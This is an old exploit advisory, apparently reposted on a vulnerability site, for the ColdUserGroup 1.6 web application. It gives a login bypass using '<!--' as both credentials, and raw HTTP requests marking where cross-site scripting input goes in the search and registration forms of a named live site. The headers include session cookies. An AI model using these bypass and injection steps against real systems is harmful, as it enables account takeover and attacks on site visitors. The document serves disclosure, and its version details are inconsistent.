ColdUserGroup 1.6 bypassd cross site scripting

2010.09.13
Credit: Sangteamtham
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#********************************************************** # Exploit Title: ColdUserGroup - Version 1.6 bypass/XSS Vulnerabilities # Date: 09/09/2010 # Author: Sangteamtham # Software Link: http://www.coldgen.com/index.cfm?ColdGen=ProductDetails&ProductID=8 # Version: 1.22 # Tested on: Windows 7 # #*********************************************************** 1.Description: Built using Fusebox and adhering to CSS/XHTML standards the ColdUserGroup application is intended to allow a quickstart to hosting your own user group web site. Currently in live use at www.actcfug.com. Some of the features in use on the live site have been removed but can be easily integrated (ie: Google Calendar). This new version now utilises FCKEditor as the rich text editor, rather than the original ActivEdit 2. Exploit 2.a: bypass login http://site.com/index.cfm?actcfug=MemberLoginForm User Name:<!-- Password :<!-- 2.b: XSS vul: In Search Form and register form, the vendor does not filter the special characters.So attackers will put the malicious code into that form. 3. Poc: Victim: http://victim.com/index.cfm 3.a. Login form: I found it work just in opera Version 10.61 only 3.b. Forgotten form: 3.b.1: http://site.com/index.cfm?fuseaction=LookupPassword +Header: Host: www.site.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.actcfug.com/index.cfm?actcfug=SearchSite Cookie: CFID=974979; CFTOKEN=59397041; __utma=125918109.619983113.1284030540.1284030540.1284033833.2; __utmz=125918109.1284030540.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=8430f8fc4fd40c79c0eba2e6d59e557c2e4a; __utmc=125918109; __utmb=125918109 + Post data: Content-type: application/x-www-form-urlencoded\r\n Content-length: 99\r\n \r\n SubmitForm=Search%20Site&Keywords=[XSS here]&Category=Articles 3.b.2: Header: Host: www.actcfug.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.actcfug.com/index.cfm?actcfug=MemberJoin Cookie: CFID=974979; CFTOKEN=59397041; __utma=125918109.619983113.1284030540.1284030540.1284033833.2; __utmz=125918109.1284030540.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=8430f8fc4fd40c79c0eba2e6d59e557c2e4a; __utmc=125918109; __utmb=125918109 Post data: Content-type: application/x-www-form-urlencoded\r\n Content-length: 419\r\n \r\n Join=%20%20%20Join%20the%20ACTCFUG%20%20%20&UserName=sangte&UserPassword=123456&ConfirmPassword=123456&UserFirstName=[XSS HERE]&UserLastName=amtham&UserEmailAddress=sangte%40ok%2Ecom&Newsletter=true&EmailAccount=false 4. Patch: Vender should filter the special characters when input the form. 5. Credits: Thanks flying to Vietnamese hackers and all hackers out there researching for more security. *************************************************************


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top